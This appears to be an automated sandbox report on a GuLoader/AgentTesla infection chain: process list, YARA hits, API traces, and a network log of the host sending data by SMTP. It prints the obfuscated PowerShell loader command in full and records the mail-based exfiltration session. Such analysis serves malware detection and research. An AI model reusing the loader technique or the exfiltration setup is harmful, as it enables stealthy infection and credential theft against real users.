2024-11-05 14:56:54 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 14:56:54 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dddb176d9854797-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=2244961&cwnd=251&unsent_bytes=0&cid=7a0e86d96430c35f&ts=204&x=0"
2024-11-05 14:56:54 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 Data Ascii: 173.254.250.76

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 5, 2024 15:56:57.952785015 CET	587	49923	208.91.199.223	192.168.2.7	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 5, 2024 15:56:57.952949047 CET	49923	587	192.168.2.7	208.91.199.223	EHLO 506407
Nov 5, 2024 15:56:58.110362053 CET	587	49923	208.91.199.223	192.168.2.7	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 5, 2024 15:56:58.110641956 CET	49923	587	192.168.2.7	208.91.199.223	AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
Nov 5, 2024 15:56:58.271071911 CET	587	49923	208.91.199.223	192.168.2.7	334 UGFzc3dvcmQ6
Nov 5, 2024 15:56:58.439517021 CET	587	49923	208.91.199.223	192.168.2.7	235 2.7.0 Authentication successful
Nov 5, 2024 15:56:58.439752102 CET	49923	587	192.168.2.7	208.91.199.223	MAIL FROM:<tech1@santonswitchgears.com>
Nov 5, 2024 15:56:58.621293068 CET	587	49923	208.91.199.223	192.168.2.7	250 2.1.0 Ok
Nov 5, 2024 15:56:58.621470928 CET	49923	587	192.168.2.7	208.91.199.223	RCPT TO:<tech1@santonswitchgears.com>
Nov 5, 2024 15:56:58.818651915 CET	587	49923	208.91.199.223	192.168.2.7	250 2.1.5 Ok
Nov 5, 2024 15:56:58.818753004 CET	49923	587	192.168.2.7	208.91.199.223	DATA
Nov 5, 2024 15:56:58.977708101 CET	587	49923	208.91.199.223	192.168.2.7	354 End data with <CR><LF>.<CR><LF>
Nov 5, 2024 15:56:58.978456020 CET	49923	587	192.168.2.7	208.91.199.223	.
Nov 5, 2024 15:56:59.270684958 CET	587	49923	208.91.199.223	192.168.2.7	250 2.0.0 Ok: queued as B1AD950063A

Target ID:	0
Start time:	09:56:01
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\Nt8BLNLKN7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nt8BLNLKN7.exe"
Imagebase:	0x400000
File size:	784'016 bytes
MD5 hash:	E31F6AB5E499E9708EAA3C6EF6AC690E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1228589004.0000000002719000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:56:01
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "
Imagebase:	0x210000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1536832874.0000000008DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1529740848.00000000062EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1536993111.000000000B405000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:56:01
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:10:30
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x930000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2482982085.00000000237D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1257
Total number of Limit Nodes:	33

Executed Functions

Function 00403217 Relevance: 82.6, APIs: 28, Strings: 19, Instructions: 337
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403238
SetErrorMode.KERNELBASE(00008001), ref: 00403243
OleInitialize.OLE32(00000000), ref: 0040324A

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",00000000), ref: 0040329A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",00000020), ref: 004032C5
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004033D3
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033DF
GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004033F3
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004033FB
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040340C
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403414
DeleteFileA.KERNELBASE(1033), ref: 00403428
ExitProcess.KERNEL32(?), ref: 004034D1
CoUninitialize.COMBASE(?), ref: 004034D6
ExitProcess.KERNEL32 ref: 004034F6
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",00000000,?), ref: 00403502
lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040351A
SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 00403521
DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ,?), ref: 0040357A
CopyFileA.KERNEL32(C:\Users\user\Desktop\Nt8BLNLKN7.exe,0041E8B8,00000001), ref: 0040358E
CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368F

Strings

C:\Users\user\Desktop\Nt8BLNLKN7.exe, xrefs: 00403589
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403227
C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155, xrefs: 004034B3
1033, xrefs: 00403423
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004033B7, 004033BC, 004033D2, 004033DE, 004033ED, 004033FA, 00403406, 0040340E, 00403501, 0040350D, 00403519, 00403520, 004035CF
Low, xrefs: 004033F5
C:\Users\user\Desktop, xrefs: 00403507, 0040350C, 0040352F
Error launching installer, xrefs: 0040348E
", xrefs: 004032EA
NSIS Error, xrefs: 00403278
~nsu.tmp, xrefs: 004034FC
$Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier), xrefs: 00403562, 004035C5
SeShutdownPrivilege, xrefs: 00403626
TEMP, xrefs: 00403407
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 004033A7, 004034A8, 00403527, 00403530
\Temp, xrefs: 004033D9
TMP, xrefs: 0040340F
"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) , xrefs: 0040353E
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 0040328D, 00403293, 0040344C

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\Nt8BLNLKN7.exe"$"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) $$Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier)$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155$C:\Users\user\Desktop$C:\Users\user\Desktop\Nt8BLNLKN7.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 2762237255-2630386136
Opcode ID: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
Opcode Fuzzy Hash: ad8daaa377ef6082241525d97a33f3446afdd9c228298bd2e1744150241bbf9a
Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

Function 0040511A Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 280
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040517A
GetDlgItem.USER32(?,000003EE), ref: 00405189
GetClientRect.USER32(?,?), ref: 004051C6
GetSystemMetrics.USER32(00000015), ref: 004051CE
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051EF
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405200
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405213
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405221
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405234
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405256
ShowWindow.USER32(?,00000008), ref: 0040526A
GetDlgItem.USER32(?,000003EC), ref: 0040528B
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040529B
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052B4
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052C0
GetDlgItem.USER32(?,000003F8), ref: 00405198

Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F

GetDlgItem.USER32(?,000003EC), ref: 004052DC
CreateThread.KERNELBASE(00000000,00000000,Function_000050AE,00000000), ref: 004052EA
CloseHandle.KERNELBASE(00000000), ref: 004052F1
ShowWindow.USER32(00000000), ref: 00405314
ShowWindow.USER32(?,00000008), ref: 0040531B
ShowWindow.USER32(00000008), ref: 00405361
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405395
CreatePopupMenu.USER32 ref: 004053A6
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053BB
GetWindowRect.USER32(?,000000FF), ref: 004053DB
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053F4
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405430
OpenClipboard.USER32(00000000), ref: 00405440
EmptyClipboard.USER32 ref: 00405446
GlobalAlloc.KERNEL32(00000042,?), ref: 0040544F
GlobalLock.KERNEL32(00000000), ref: 00405459
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040546D
GlobalUnlock.KERNEL32(00000000), ref: 00405486
SetClipboardData.USER32(00000001,00000000), ref: 00405491
CloseClipboard.USER32 ref: 00405497

Strings

reckling: Installing, xrefs: 0040540C

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: reckling: Installing
API String ID: 590372296-1062532133
Opcode ID: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
Instruction ID: 0982c58dd6aff3abb9cbe356e138a5b54def650ce905af7e846a86ee5d5c2f58
Opcode Fuzzy Hash: c4cb536f8e799d3d5e9376cf28b8e230f7fac2783e3879569b83d2f34c1c5795
Instruction Fuzzy Hash: 43A15BB1900208BFDB219FA0DD89AAE7F79FB08345F00407AFA04B61A0C7B55E51DF69

Function 00405D13 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000), ref: 00405DC4
GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E3F
GetWindowsDirectoryA.KERNEL32(004226A0,00000400), ref: 00405E52
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00405E9C
CoTaskMemFree.OLE32(00000000), ref: 00405EA7
lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
lstrlenA.KERNEL32(004226A0,?,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000,00405014,Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",00000000), ref: 00405F1B

Strings

Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ", xrefs: 00405D42
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) , xrefs: 00405EF3

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) $Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-4197512952
Opcode ID: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
Opcode Fuzzy Hash: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 004055DA
lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405622
lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405643
lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405649
FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 0040565A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
FindClose.KERNEL32(00000000), ref: 00405718

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004055BF
\*.*, xrefs: 0040561C
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 004055B1

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-523853321
Opcode ID: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
Opcode Fuzzy Hash: eb34a846460c19c0258b3e4f17f040ba4638f1e183412731446f157f3717bfe2
Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E

Function 004062CB Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45

Function 0040601C Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

